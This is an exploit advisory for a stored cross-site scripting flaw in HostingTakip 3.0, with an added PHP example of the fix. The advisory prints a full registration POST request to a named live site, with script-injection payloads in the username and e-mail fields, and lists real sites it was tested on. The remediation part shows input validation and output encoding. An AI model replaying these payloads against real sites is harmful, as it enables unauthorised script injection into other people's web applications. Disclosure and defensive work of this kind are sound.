HostingTakip 3.0 Cross Site Scripting

2015.03.17
Credit: KnocKout
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

HostingTakip v3.0 - Stored XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
Love to _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu ( milw00rm.com )
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : HostingTakip
|~Affected Version : v3.0
|~Software : http://www.hostingtakip.com & http://wmscripti.com/php-scriptler/hostingtakip-hosting-yonetim-scripti.html
|~Official Demo : http://hostingtakip.teknoder.com/demo/
|~RISK : Medium
|~Tested On : [L] Windows 7, Mozilla Firefox
####################INFO################################
An XSS payload can be executed through the customer registration form. Click "Yeni Müşteri" ("New Customer"): the e-mail field on that form is stored without any filtering or encoding. Whatever is entered there is written to the database and later rendered by "uye-duzenle.php", so the payload is persistent (stored XSS) and executes every time that page is viewed.
########################################################
Tested on:
http://www.ayashosting.com
http://www.oneritasarim.com/hostingtakip/
----------------------------------------------------------
Proof image: http://i.hizliresim.com/mGZzQ8.png
----------------------------------------------------------
Request
----------------------------------------------------------
POST http://www.oneritasarim.com/hostingtakip/kayit_tamamla.php

Request Headers:
Host[www.oneritasarim.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.oneritasarim.com/hostingtakip/y_kullanici.php]
Cookie[PHPSESSID=1b4b474c7fc50e0885aae61274ac0b55; __utma=221857094.828791546.1426246879.1426246879.1426246879.1; __utmc=221857094; __utmz=221857094.1426246879.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)]
Connection[keep-alive]

Post Data:
kadi[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
posta[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
sifre[123456]
ad[123456]
tc[012345678901]
tel[12345678901]
mustip[b]
sehir[h4]
ilce[h4]
adres[h4x0resec.blogspot.com]
hakkimda[h4]
guv[1b4b47]
B1[G%F6nder]

Response Headers:
Content-Encoding[gzip]
Vary[Accept-Encoding]
Date[Fri, 13 Mar 2015 12:18:10 GMT]
Server[LiteSpeed]
Connection[close]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Content-Length[143]
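The advisory describes the classic stored-XSS pattern: a form value (the "posta" e-mail field, and "kadi") is saved unfiltered and later echoed into an HTML page. The PHP below is an added illustration written for this page; it is not HostingTakip's own code. The field names "posta" and "kadi" are taken from the POST request above, while the function names, the username character set and the way the customer-edit page renders the value are assumptions. It shows the vulnerable rendering next to the two defences that close CWE-79 here: validating the e-mail on input and, independently, encoding every value on output.

```php
<?php
// Added example, not HostingTakip's code. Field names 'posta' and 'kadi'
// come from the advisory's POST request; everything else is assumed.
declare(strict_types=1);

// Input validation: an e-mail address that fails FILTER_VALIDATE_EMAIL is
// rejected, so a value containing '<', '>' or quotes never reaches storage.
function validate_customer_input(array $post): array
{
    $errors = [];

    $email = filter_var(trim($post['posta'] ?? ''), FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $errors['posta'] = 'Invalid e-mail address';
        $email = '';
    }

    // Assumed policy for usernames: a conservative allow-list is simpler to
    // reason about than trying to strip dangerous characters.
    $username = trim($post['kadi'] ?? '');
    if (!preg_match('/^[A-Za-z0-9._-]{3,32}$/', $username)) {
        $errors['kadi'] = 'Username may contain only letters, digits, . _ -';
    }

    return ['errors' => $errors, 'kadi' => $username, 'posta' => $email];
}

// Output encoding: applied to every value placed into HTML, regardless of
// whether it was validated, so the page stays safe even for records that
// were stored before the input check existed.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering (the behaviour the advisory reports): the stored
// value is concatenated straight into the attribute on uye-duzenle.php.
function render_email_field_vulnerable(string $storedEmail): string
{
    return '<input type="text" name="posta" value="' . $storedEmail . '">';
}

// Hardened rendering: the same markup, with the value encoded for the
// attribute context. ENT_QUOTES matters because the value sits inside
// double quotes; without it a '"' would still close the attribute.
function render_email_field_safe(string $storedEmail): string
{
    return '<input type="text" name="posta" value="' . h($storedEmail) . '">';
}

// Constructed sample input, shaped like the advisory's request body.
$input = [
    'kadi'  => 'testuser',
    'posta' => '"><script>alert(1)</script>',
];

$result = validate_customer_input($input);
foreach ($result['errors'] as $field => $message) {
    echo "rejected {$field}: {$message}\n";   // the input check blocks it
}

// If such a value is already in the database, only output encoding helps:
echo render_email_field_vulnerable($input['posta']), "\n"; // attribute broken
echo render_email_field_safe($input['posta']), "\n";       // rendered as text
```

Both layers are needed: validation keeps the database clean for new registrations, but an existing record, or a field with a looser format than an e-mail address ("hakkimda", "adres"), is only safe if the template encodes on output. A Content-Security-Policy without "unsafe-inline" would further limit what a stored payload could do if either layer is missed.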

